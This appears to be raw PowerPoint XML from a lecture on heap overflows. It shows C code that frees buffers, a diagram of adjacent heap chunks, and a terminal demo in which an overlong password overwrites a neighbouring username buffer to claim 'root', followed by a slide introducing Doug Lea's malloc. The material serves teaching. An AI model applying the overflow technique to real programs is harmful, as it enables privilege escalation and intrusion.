              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> end:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fflush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1346971177"/>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77250" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple Heap Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077253" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2743200"/>
            <a:ext cx="1295400" cy="22860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600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077254" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="2743200"/>
            <a:ext cx="2362200" cy="22860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600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077255" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="2743200"/>
            <a:ext cx="1981200" cy="22860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600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077256" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2743200"/>
            <a:ext cx="1295400" cy="22860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600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077257" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="2383632"/>
            <a:ext cx="1063112" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x8fe3008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077258" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="2396729"/>
            <a:ext cx="1063112" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x8fe3090</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077259" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304802" y="3096817"/>
            <a:ext cx="4900701" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fooooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ooooooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ooooo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>*** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> detected *** ./test: free(): invalid next size (fast): 0x0807f008 ***</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>======= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Backtrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>: =========</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6[0xb33424]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6(__libc_free+0x77)[0xb3395f]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>./test[0x8048791]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6(__libc_start_main+0xc6)[0xae4de6]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>./test[0x8048525]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>oooooooroot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>oooooooroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> for user root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="676838050"/>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39364" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Doug Lea’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Malloc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039365" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bin Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Allocation	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Deallocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>List Handling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60416790"/>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1422" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041423" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap is divided into contiguous chunks of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Each memory chunk can be allocated, freed, split, coalesced (two free chunks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No two free chunks may be physically adjacent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041424" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4574431"/>
            <a:ext cx="914400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041425" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="4574431"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041426" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4574431"/>
            <a:ext cx="762000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041427" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="4574431"/>
            <a:ext cx="914400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041429" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857250" y="3943401"/>
            <a:ext cx="1249060" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Low addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041430" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410201" y="3888632"/>
            <a:ext cx="1279517" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
